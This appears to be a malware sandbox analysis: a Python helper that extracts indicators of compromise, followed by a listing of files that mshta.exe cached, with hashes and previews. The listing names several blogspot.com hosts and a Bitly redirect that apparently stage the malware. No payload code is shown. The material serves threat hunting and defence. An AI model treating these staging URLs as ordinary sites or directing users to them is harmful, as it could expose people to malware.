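def fetched_by(records, exe_name):
    """Files a given process pulled from the network (only those carry an IE Cache URL)."""
    suffix = "\\" + exe_name.lower()
    return [r for r in records
            if r.get("Process", "").lower().endswith(suffix) and "IE Cache URL" in r]


def contacted_hosts(records, exe_name):
    """Distinct hosts the process reached; for mshta.exe these are the staging hosts."""
    return sorted({urlparse(r["IE Cache URL"]).hostname for r in fetched_by(records, exe_name)})


def duplicate_content(records):
    """SHA-256 values seen more than once: identical bytes delivered from several URLs."""
    by_hash = defaultdict(list)
    for r in records:
        if "SHA-256" in r:
            by_hash[r["SHA-256"].lower()].append(r)
    return {h: rs for h, rs in by_hash.items() if len(rs) > 1}


def ioc_summary(records, exe_name):
    """The indicator set an analyst would lift from this section for the named process."""
    fetched = fetched_by(records, exe_name)
    return {
        "hosts": contacted_hosts(records, exe_name),
        "urls": sorted(r["IE Cache URL"] for r in fetched),
        "sha256": sorted({r["SHA-256"].lower() for r in fetched if "SHA-256" in r}),
    }


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    print(ioc_summary(recs, "mshta.exe"))
    for digest, same in duplicate_content(recs).items():
        print(digest, "->", [r.get("IE Cache URL", r["path"]) for r in same])
```

The duplicate check is the caveat worth carrying into a hunt: cookienotice[1].js and cookienotice[2].js hash identically because both are Blogger's stock script served under two blog names, so that SHA-256 (like the blogger.com and blogblog.com assets) is not a useful indicator, whereas the two blogspot.com hostnames that mshta.exe loaded are.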

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3858658042-comment_from_post_iframe[1].js
Process:C:\Windows\System32\mshta.exe
File Type:ASCII text, with very long lines
Category:downloaded
Size (bytes):13346
Entropy (8bit):5.405149681041944
Encrypted:false
SSDEEP:192:BqWjbSFO5Og47t7xNycGK7SlV4cjCqN1Yae3CCaJzWTKtTOpY2Dzt8cvtWPXtxQK:BqGSFOsZM61WyV3CCaJIav2F8G2XnQK
MD5:EE77AB1C7CA023A501E4DA28CCC2915F
SHA1:F309FB6B570041EE11C830ABA4DD58D586D193B6
                                                                                                                                                                                                            SHA-256:A09131F2885086EB3DEA6A379C43E58C88E683B99FB7CF9CEFDE399DFD68D0FF
                                                                                                                                                                                                            SHA-512:DE42C9F444DC0D617EE12FBACE43F8EB659FBB461A6B03AD851A21FED5B44721D63D66A0802915DA387F0FD1FDD2BC06AA9A4E00FC18E2125B89A3D2238BE6A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f="function",k="string",l,n=this||self,p=function(a){var b=typeof a;b="object"!=b?b:a?Array.isArray(a)?"array":b:"null";return"array"==b||"object"==b&&"number"==typeof a.length};var q=Array.prototype.indexOf?function(a,b,c){return Array.prototype.indexOf.call(a,b,c)}:function(a,b,c){c=null==c?0:0>c?Math.max(0,a.length+c):c;if(typeof a===k)return typeof b!==k||1!=b.length?-1:a.indexOf(b,c);for(;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},r=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=typeof a===k?a.split(""):a,g=0;g<d;g++)g in e&&b.call(c,e[g],g,a)};.function t(a){return Array.prototype.concat.apply([],arguments)};var u;a:{var v=n.navigator;if(v){var w=v.userAgent;if(w){u=w;break a}}u=""}var x=function(a){return-1!=u.indexOf(a)};var y=x("Trident")||x("MSIE");var z=function(a,b){return typeof b===k?a.getElementB
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):287
                                                                                                                                                                                                            Entropy (8bit):7.171262501317191
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtQeA5M/H2XUm2R+sWN/vlaUZpQFS9YI3m6od9IUEoXLbveYGak5sOR:XdyM/H2XUm2YsWN/tBJD3mJT98L
                                                                                                                                                                                                            MD5:2F0617DDC36B03F4723AD04D4891F74E
                                                                                                                                                                                                            SHA1:4A0ED082B77CA3E70DE11FC42AED497A7C067E94
                                                                                                                                                                                                            SHA-256:E036CAB59948C4704421AAA2090E662FFAD53D794FB9C84206FFFA7208591993
                                                                                                                                                                                                            SHA-512:87BC8CF6961E4DCC757188B9E9DD109F4C7201591F80FED28DCD731F3AF79249B3C76CDE020021D38B72C125DDA993D14A092FE9DA6B4382BD60B9BCEBB073DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........1O.0.....+..6i...T-M)R.J.H0&..X8>+v...IL..s.=.}.<.d.wE6I..r=4..<.....Cc.-[......$.......z~...C.]mBE...|x...._...@.(...'u.H..dI..|.F...=0V....JD...l.+.'%.@..B...t.^.}..J....z..P........t...U).*4.......Kz..2.G$..o.tv_Y..{|]6........-.S'H}.A.H.:.jh!a....Q..B.?.".h....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://randikhanaekminar.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[2].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://backbones1234511a.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\css[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                            Entropy (8bit):5.119931778220296
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:0SYWFFWlIYCiF15RI5XwDKLRIHDfFWYhfqzrZqcdJ2dTi8EuRlGwLYRLAK1Yvn:0IFFm15+56Zzhizlpd0celB4zSv
                                                                                                                                                                                                            MD5:C141D007243B3488466496ED83F13B2F
                                                                                                                                                                                                            SHA1:F184CE8D5074D7B510E2A529AECCF0B3DB0F8EBE
                                                                                                                                                                                                            SHA-256:D9427036A7A10029E9B0454939E9BB5095D217AFCFC8EF43E2B49F870B0562EA
                                                                                                                                                                                                            SHA-512:C7482956BA1522ED07C777415571213ED3F746A7FFCC0FFC7B31DB992393559E23E13C5585B3DDD52728D1B943484B3BC8D04FD1DB6C47D9750F84E9DB5E4706
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://fonts.googleapis.com/css?family=Open+Sans:300
                                                                                                                                                                                                            Preview: @font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN_r8OUuht.eot);.}.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dbgghasdnasdjasgdakgsdhv[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):137
                                                                                                                                                                                                            Entropy (8bit):4.639845182808017
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVvzLURODccZ/vXbvx9nDydD+M5zXKlWnLNGHbjkFSXbKFvNGb:qFzLIeco3XLx92tz5zXKlO87jMSLWQb
                                                                                                                                                                                                            MD5:D86CDDDEC21570C2E24C90E1E4ACE774
                                                                                                                                                                                                            SHA1:6B9A49121E9D26DAD7EB0EB9BF974109A46D944C
                                                                                                                                                                                                            SHA-256:01458D44E9CEAFE97FB50BAC49BB2C3BFA126B6A7F67CD7E2B536487CD41C338
                                                                                                                                                                                                            SHA-512:F48494E39468AD998E188F724AF4E3BFA057384CCE601E14760158CC18339B7FD140625188BC8508C0A1A67FDCB12951ABC83EC8BC5EC98D89C135F1039A8102
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://mainjigijigi123.blogspot.com/p/st2222.html">moved here</a></body>.</html>
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[2]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ghostbackup13[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):30345
                                                                                                                                                                                                            Entropy (8bit):5.38968098341023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ms+0q2o35xCHMsV1oHHXfPWdT7ELLAZuSXn7bF3peggwjLFjjW82SHdllsmR/8d:ZE3eyHHvPWdcLLAZuSXnVggt72SHU
                                                                                                                                                                                                            MD5:48245C14CB5FABC9DE13624D15960409
                                                                                                                                                                                                            SHA1:43C4EFD1E023A67E41CB247144EEFD77845720DB
                                                                                                                                                                                                            SHA-256:97E1F2201FE9E16C0B60857431C3D90377DA98C829C6E7A3A3F0F8F760DD7ED8
                                                                                                                                                                                                            SHA-512:62E6A7AF042B03E9ABEF036046242E1E0B9F9E68343028EAD60C424C8474502E4D1AEA4826247B726BBFFD42787279EDF5F1008408826028A9513B01FE426874
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://ghostbackbone123.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://ghostbackbone123.blogspot.com/p/ghostbackup13.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="ghostbackbone - Atom" href="https://ghostbackbone123.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="ghostbackbone - RSS" href="https://ghostbackbone123.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="ghostbackbone - Atom" href="https://www.blogger.com/feeds/1690726786805467605/posts/default" />. [if IE]><script t
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\st2[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33738
                                                                                                                                                                                                            Entropy (8bit):5.52621033813305
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:kI3eyHHvPWdWj0S2vc26nJo6iXnVgMNG2SGo:kI3LHH2dWj72ZKJo6GgMNS
                                                                                                                                                                                                            MD5:4471AED27F6F7476F83FF74C5AA21822
                                                                                                                                                                                                            SHA1:11F39F288AF421327BBC9E8E573503B1A22905CE
                                                                                                                                                                                                            SHA-256:F99248B36DEDF11DCB731D26CACE0C77C3B6E3FA630D78F84D13BC88B8217333
                                                                                                                                                                                                            SHA-512:4E90688AF855311A24AA469006098A5B7B7ABF5140CF315C98384089A7AA554F77081E86809B9E850C44188F9E042728C18DB99756DB1B388896EE047D2807B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://randikhanaekminar.blogspot.com/p/st2.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://randikhanaekminar.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://randikhanaekminar.blogspot.com/p/st2.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="randiblog - Atom" href="https://randikhanaekminar.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="randiblog - RSS" href="https://randikhanaekminar.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="randiblog - Atom" href="https://www.blogger.com/feeds/4778963473423104316/posts/default" />. [if IE]><script type="text/javas
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\3416767676-css_bundle_v2[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):36990
                                                                                                                                                                                                            Entropy (8bit):5.156709527997923
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:B0OhFvg3AwN6VysImDyPWquJMpx/SCYW0bS8+Rl9yapwuJ86YKSQCNL/J69nag9N:B0Oh+/N6nIm6IvW0ErVJwxgngRdFr2
                                                                                                                                                                                                            MD5:0BEF7C3D549CA15E5FE23315FC211990
                                                                                                                                                                                                            SHA1:28E3A4693A8F0212850A38303A037A6DDBC14D2E
                                                                                                                                                                                                            SHA-256:C91AFADBE63DD834AAC00B49BC715795DA58970E7D500C4BD8F50ED713C77880
                                                                                                                                                                                                            SHA-512:6A255013A987FFFAE23B8AF3A19471CBC4E51F747F41E1341596829FB3316B74882B43F281A9F0741FAEC345F92C6A784EE6C9BEB28D23F211D099D32C597961
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
                                                                                                                                                                                                            Preview: body{margin:0;padding:0 0 1px}.content-outer,.header-outer,.tabs-outer,.main-outer,.main-inner,.footer-outer,.post,.comments,.widget,.date-header,.inline-ad{position:relative;min-height:0;_position:static;_height:1%}.footer-outer{margin-bottom:-1px}.content-inner{padding:10px}.tabs-inner{padding:0 15px}.main-inner{padding:30px 0}.main-inner .column-center-inner,.main-inner .column-left-inner,.main-inner .column-right-inner{padding:0 15px}.footer-inner{padding:30px 15px}.section{margin:0 15px}.widget{margin:30px 0;_margin:0 0 10px}.section:first-child .widget:first-child{margin-top:0}.section:first-child #uds-searchControl+.widget{margin-top:0}.section:last-child .widget:last-child{margin-bottom:0}.tabs:first-child .widget{margin-bottom:0}body .navbar{height:30px;padding:0;margin:0}body .navbar .Navbar{position:absolute;z-index:10;left:0;width:100%;margin:0;padding:0;background:none;border:none}.header-inner .section{margin:0}.header-inner .widget{margin-left:30px;margin-right:30px}.hea
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\84067855-widgets[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):144902
                                                                                                                                                                                                            Entropy (8bit):5.570242774242284
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sf0jKyeUNEWa9MW7zShH4CUMFvkcPe611Cg3x6sMuXgktbdrvh/0ie2zKQ+TtY7g:SnU4CXNew1Cox8210ipOz4m
                                                                                                                                                                                                            MD5:63642B890AD1CBD4C33DF076775147A8
                                                                                                                                                                                                            SHA1:501936F025C1D9F1EA5401E9743632C6C1284A71
                                                                                                                                                                                                            SHA-256:A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
                                                                                                                                                                                                            SHA-512:3E895BE361F4EB95C073D284D81D88EC9D40FA66E87797DB38FAC162CDBBA1FBD256B436F738C5D60612C62CEBEA4DB84B2392BDE0D5FF1167B4BAD10F8D59CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/widgets/84067855-widgets.js
                                                                                                                                                                                                            Preview: (function(){var aa="&action=",ca=".wikipedia.org",da="CSSStyleDeclaration",ea="Clobbering detected",fa="Edge",ha="Element",ia="GET",ja="Never attached to DOM.",ka="SPAN",la="STYLE",ma="SW_READER_LIST_",na="SW_READER_LIST_CLOSED_",oa="Share this post",pa="Symbol.iterator",qa="_blank",ra="about:invalid#zClosurez",sa="about:invalid#zSoyz",ta="attributes",ua="block",va="chooseWidget",wa="click",xa="collapsed",ya="collapsed-backlink",za="collapsible",Aa="comment-editor",Ba="complete",Ca="configure",Da="contact-form-email",.Ea="contact-form-email-message",Fa="contact-form-error-message",Ga="contact-form-error-message-with-border",Ha="contact-form-name",Ia="contact-form-submit",Ja="contact-form-success-message",Ka="contact-form-success-message-with-border",La="data-height",Ma="data-sanitizer-",Na="data-viewurl",Oa="displayModeFull",Pa="displayModeLayout",Qa="displayModeNone",k="div",Ra="dropdown-toggle",Sa="error",Ta="expanded",Ua="expanded-backlink",Va="followers-grid",l="function",Wa="getAt
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                            Entropy (8bit):7.171132079129412
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtZVGhY/4DPyA6kj0VRCi74U13+4LqpQOBdxgUnF68/:XchY/xAdUCc4U1GO6rgUnh/
                                                                                                                                                                                                            MD5:730697C689F5C37C8441656B65C65F91
                                                                                                                                                                                                            SHA1:24C701AEA86212CECE66DD7DD26B3FBD88A93682
                                                                                                                                                                                                            SHA-256:908C6760208DE411D85137226ACDC8AD5F061B9700BD55174EABEDFA558F5940
                                                                                                                                                                                                            SHA-512:2C2B4DB1ECA0023D19DE1D5ED4534D26247EDA71BC9B75581FABE4306BDF23802C37A35BECA2FCF6218236574F4B3021959AE1AC091419AE4FAEF072E2528B88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........QAN.0....VP9..8@.*%)EJU....i.8F...F...7....zf.0..l.l.....2...N.....T.....%."\...~~.W.C..l."..w>.w..7.k.8......^....A..d{(7i.zo..cu.`o...Q(..j...Y6P..f.....^..0.B!...KC.j"..;T.eq..Z./).T.bI........z....Ur.............vN.!.].a 0.(k........B............
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[2].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                            Entropy (8bit):7.28105912472404
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtwVpe2C2X8PnE+diknJLyw8w45Mpii0Y9YzgRCe/Xm68RDW1o0uel:XiVw2C2X8PnTYkJLy1/5FJ65/2686oY
                                                                                                                                                                                                            MD5:4D81C371377D85872CDA9F8F8864118F
                                                                                                                                                                                                            SHA1:95F2403317D5A30FFFE85BD92D61198DD5C365B4
                                                                                                                                                                                                            SHA-256:2A76F5F170530C3A66BEA30991EFDCF5F8CFD9C5EE537914F57B39163751E90D
                                                                                                                                                                                                            SHA-512:23FD5C5E74FAFE5A9F164BD30AC54A6276DFC2DD292DFC687B2520A27A06BD5FB831247D9AFB7B481F6C3BB9B52DF1A82B162A1524298A18C6A0DF9C6D0A43B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ............1O.0.....+..6-..$.Z.R..J.H0...X.}..4....1s.=.}.<.|._.r.o..zh...U..g8....^..,&9..W...Y==....6.2.w><oRe..._..@..t.l$...$._....Y..........@%..@.4...Y5P.Tv...vP\.}..F).'z..R..Ep.....v}...Guj..p2..O/\r;...........ka..'j.}...c'BPg(.. .$&..-x...CRcD)...7.}......
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[3].htm
Process: C:\Windows\System32\mshta.exe
File Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Category: dropped
Size (bytes): 287
Entropy (8bit): 7.22084343721493
Encrypted: false
SSDEEP: 6:XtQepmZpKCGFa2VIqQAN3kVqoltZ1iOS6O2TCO0yb:XdpmKCGGqnkLptS6O27
MD5: 6D3F23BA12AE1D4D66D2D12AC6F8A9F0
SHA1: E075FB33FE3072030364CCC455CDC7F0DC752A49
